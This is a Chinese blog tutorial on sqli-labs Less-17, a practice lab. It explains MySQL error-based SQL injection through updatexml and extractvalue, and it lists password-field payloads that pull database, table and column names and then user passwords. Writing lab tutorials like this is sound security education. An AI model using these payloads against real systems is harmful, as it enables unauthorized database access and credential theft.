superforming的sql-labs大通关之特殊关卡(十七关)解析及注入方法

最新推荐文章于 2024-05-13 20:41:44 发布
最新推荐文章于 2024-05-13 20:41:44 发布
阅读量494 收藏 1
点赞数 2
文章标签: mysql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53061933/article/details/113750554
版权

superforming的sql-labs大通关

第一部分(第1~10关)
第二部分(第11~16关)
第三部分(特殊的17关)
持续更新…continue…

提要

本文中的sql语句不可以直接复制到靶场中注入,因为编辑的时候不一定是用英语符号,直接复制可能不会注入成功。我写这一系列的博客,主要是记录的自己的学习心路。

<1>特殊之处

(1)与之前关卡相比
  • 1.在前十六关,我只讲了sql-labs基于get数据传输方式的“联合查询”、“布尔盲注”、“时间盲注”、和基于post传输数据方式的“联合查询”、“布尔盲注”、“时间盲注”。这一关可以用使用的“报错注入”和“时间盲注”,前面的关卡用过时间盲注这一关就用报错注入。下面来分析一下为什么能使用“报错注入”,观察源码就会发现调用了“mysql_erroe函数”与“print_r函数”将报错信息输出,所以可以进行"报错注入",但是不能进行联合查询,因为没有回显。调用的函数是mysql_query函数所以不能堆叠注入。【如下图】

在这里插入图片描述

  • 2.同时也首次调用"check_input()函数"对变量“uname”进行过滤。【如下图】

在这里插入图片描述

(2)与之后关卡相比

这一关源码首次调用了“update”这可以更新数据库数据,所以在完成通过以后为了不影响以后的关卡要进行相应操作,或者在操作时不要改成奇奇怪怪的“password”。
在这里插入图片描述

<2>报错查询原理

(1)extractvalue函数
  • 1.函数作用:这一个函数的作用是返回对应路径下的内容。
  • 2.语法机构:extractvalue(xml_document,xpath_string)
  • 3.解释:xml_document就是xml文档的名字,xpath_string就是文档中的路径,且要符合xpath语法
  • 4.报错原理:当应该输入路径的地方没有遵循xpath语法就会报错,如果网站会将数据库的报错返回到网页上,那我们就可以基于这一点爆取信息,这就是报错注入。
(2)updatexml函数
  • 1.函数作用:将对应路径下的值变为新值。
  • 2.语法结构:updatexml(xml_document,xpath_string,new_value)
  • 3.解释:前两个参数和之前的函数一样,最后的参数是一个常量是要被赋予的新值。
  • 4.报错原理:当应该输入路径的地方没有遵循xpath语法就会报错,如果网站会将数据库的报错返回到网页上,那我们就可以基于这一点爆取信息,这就是报错注入。

<3>具体步骤

(1)第一步:判断是否存在注入

和前几关基于post数据传输的步骤类似,在“username”和“password”中分别尝试数据包裹的常用的七种方式(“无包裹”、“单引号”、“双引号”、“单引号加单括号”、“双引号加单括号”、“单引号加双括号”、“双引号加双括号”),判断是否有注入。

  • 1.在”username“处进行注入最终发现尝试完七种包裹方式还是不能注入成功,只能得到如下图的结果,证明应该将输入的信息进行了过滤。
    在这里插入图片描述

  • 2.在“password”处进行注入发现,包裹方式为“单引号”。

(2)第二步:爆库名

进行了上文的分析,我们已经知道这一关要基于“报错查询”进行注入,并且只能在“password”处进行注入,所以我们在"username"处输入:

admin

在"password"处输入:

admin’ and updatexml(‘forming is very handsome’,concat(’,’,(select schema_name from information_schema.schemata limit x,1),’,’),‘forming is very handsome’) #

或者

admin’ and extractvalue(‘forming is very handsome’,concat(’,’,(select schema_name from information_schema.schemata limit x,1),’,’)) #

特别要注意的是“password”处的“x”是“可变的整数”,意思就是开始数字为0,报完一个数据库的名字之后加一爆下一个的数据库名,这是因为mysql_erroe函数一次的返回只能返回一行数据,不然会报出如下图所示的错误
在这里插入图片描述
输入正确以后会返回如下的网页(以x为零做例子)
在这里插入图片描述

(3)第三步:爆表名

和上面第二部类似,只需要改动几处。我们要在“username”处输入:

admin

在“password”处输入:

admin’and updatexml(‘forming is very handsome’,concat(’,’,(select table_name from information_schema.tables where table_schema=‘security’ limit x,1),’,’),‘forming is very handsome’) #

或者

admin’and extractvalue(‘forming is very handsome’,concat(’,’,(select table_name from information_schema.tables where table_schema=‘security’ limit x,1),’,’)) #

特别要注意的是“password”处的“x”是“可变的整数”,意思就是开始数字为0,报完一个数据库的名字之后加一爆下一个的数据库名,这是因为mysql_erroe函数一次的返回只能返回一行数据,不然会报出如下图所示的错误
以"x"为0为例输入正确会有如下结果
在这里插入图片描述

(4)第四步:爆字段名

在“username”处输入:

admin

在“password”处输入:

admin’and updatexml(‘forming is very handsome’,concat(’,’,(select column_name from information_schema.columns where table_name=‘users’ limit x,1),’,’),‘forming is very handsome’)#

或者

admin’and extractvalue(‘forming is very handsome’,concat(’,’,(select column_name from information_schema.columns where table_name=‘users’ limit x,1),’,’))#

特别要注意的是“password”处的“x”是“可变的整数”,意思就是开始数字为0,报完一个数据库的名字之后加一爆下一个的数据库名,这是因为mysql_erroe函数一次的返回只能返回一行数据,不然会报出如下图所示的错误
以"x"为0为例输入正确会有如下结果

在这里插入图片描述

(5)第五步:爆字段
对“You can’t specify target table ‘users’ for update in FROM clause”和“Every derived table must have its own alias”报错的解决及原理

  • 【1】:原理
    爆字段和前面那几步有根本的不同,首先就是通过网页post传递数据之后经过php脚本在数据库中查信息,在slect一个表的情况下,不能指定该表中的明确的目标进行更改。如果按照上面和我之前的博文进行举一反三的话会有如下报错
    在这里插入图片描述
    而我们用“创建表”的方法解决以后会因为这个表没有别名“alias”而有如下报错
    在这里插入图片描述

  • 【2】:解决办法
    既然没办法在select一个表的情况下,update一个表,那我们只需要先执行一个select在这一个基础上select这个select结果,就可以解决第一个问题。同时用"as"的方式解决第二个报错的问题

具体步骤
  • 【1】在“username”处输入:

admin

  • 【2】在这里用“password”做比,查“username”请读者举一反三
    在“password”处输入:

admin’and updatexml(‘forming is very handsome’,concat(’,’,(select password from ((select password from users) as formingisveryhandsome) limit x,1),’,’),‘forming is very handsome’)#

或者

admin’and extractvalue(‘forming is very handsome’,concat(’,’,(select password from((select password from users)as formingisveryhandsome) limit x,1),’,’))#

特别要注意的是“password”处的“x”是“可变的整数”,意思就是开始数字为0,报完一个数据库的名字之后加一爆下一个的数据库名,这是因为mysql_erroe函数一次的返回只能返回一行数据,不然会报出如下图所示的错误
就可以实现注入sql语句查询密码。以x0为例若输入正确会得到如下图所示的结果:
在这里插入图片描述

第六步:数据库还原

这一关特殊之处在于用“update”对数据库中的数据进行改变,所以我们在做完这一关之后要进行还原,还原的方法就是,回到网站的首页
在这里插入图片描述点击左上角出如上图的“Setup/reset Database for labs”就可以重置数据库

superforming的sql-labs大通关

第一部分(第1~10关)
第二部分(第11~16关)
第三部分(特殊的17关)
持续更新…continue…

SuperForming
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs 17
m0_69548793的博客
08-27 1311
sqli-labs 17
【渗透测试】sqli-labs闯(11-17)
qq_43168364的博客
04-21 738
第十一:POST型的单引号报错注入方法:联合查询 输入用户名密码,打开bp进行抓包。 将抓到的包发送到repeater模块 首先判断闭合的方式是单引号,还是其他的。用单引号闭合时回显正常。 用双引号闭合时没用,回显,可知是用单引号闭合的。 判断列数 可知有两列,接下来我们就可用联合查询了。判断联合查询的回显是否正常。 接下来得到表名,语法:dumb' and 1=2 union......
sqli-labs 第十七
最新发布
qq_64302290的博客
05-13 885
(2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。我们接着上面测试注入表名。
sqli-labs-----第17
wyzhxhn的博客
11-10 794
基于报错的更新查新。
sqli-labs第十七
m0_73248913的博客
02-11 326
sqli-labs第十七教程
sqli-labs(less-17)
筱阳的博客
06-09 3857
首先要介绍UpdateXML('xml_target','xpath_expr','new_xml')举个例子就知道了可以看到,uname用check_input()函数进行了处理看看是如何处理的只截取15个字符get_magic_quotes_gpc()当magic_quotes_gpc=On的时候,函数get_magic_quotes_gpc()就会返回1当magic_quotes_gpc=O...
sql-labs通技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
这个平台提供了多种类型的SQL注入场景,包括盲注、时间基注入、联合查询注入等,帮助用户深入理解SQL注入的工作原理和防范方法。 使用这些工具,初学者可以学习到Web应用程序安全的基础知识,而专业人士则可以提升...
SQL-labs/less1通教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
sqli-labs-master第17
m_ing
05-14 2676
前言:这一变化还是挺大的,让我们修改密码。 第17 http://192.168.89.134/sqli-labs-master/Less-17/ 到这里我们还是毫无头绪,只能看源代码 从源码中可以看到:接收到用户POST的uname和passwd后,首先根据uname查询数据库的username和password,若uname存在则用passwd替换password,若不存在则显示slap1.jpg 在用户名正确后,页面便能够返回Mysql错误信息 所以我们决定用报错注入 使用updatexml(
sqli-labs11-17详解
weixin_43061418的博客
08-30 420
这几是利用post请求注入,相知识和工具有: hackbar,可在GitHub下载不收费的 使用的注释符为# 知道sql语句中闭合使用,让语句组合连接正确 报错盲注的updatexml函数,还有extractvalue函数,name_const函数,子查询,可以自行了解一下原理和使用方法 第11 看源码 知道注入方式 这是当数据库里面有admin时可以直接登录,如果没有的话 接下来就使用order by和联合注入,直接在登录框输入 第12 登陆上了,后面的操作跟11一样 第
sqli-labs闯指南 1—10
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一1.经过语句and 1=2...
SQLi Labs Lesson17
1ame的博客
08-15 1143
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
sqli-labs ————less -17
Fly_鹏程万里
05-12 862
Less-17源代码如下:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xmlns="http://www.w3.org/1999/xhtml"&gt; &lt;head&..
sqllab十七笔记
I_WORM的博客
03-15 363
构造payload:passwd=admin'+and+extractvalue(1,concat(0x7e,,0x7e))='1。直接构造payload:passwd=admin'+and+exp(710)'修改payload:passwd=admin'+and+exp(710)='1。发现有错误提示,说明单引号起作用了,按理说引号已经闭合了,为啥还有错误呢。看提示应该是程序把'where username='识别成字符串了。成功触发了exp()函数的错误提示;接下来利用错误注入获取数据库的名字。
Sqlilabs-17
KAKA的博客
07-07 851
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperForming

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值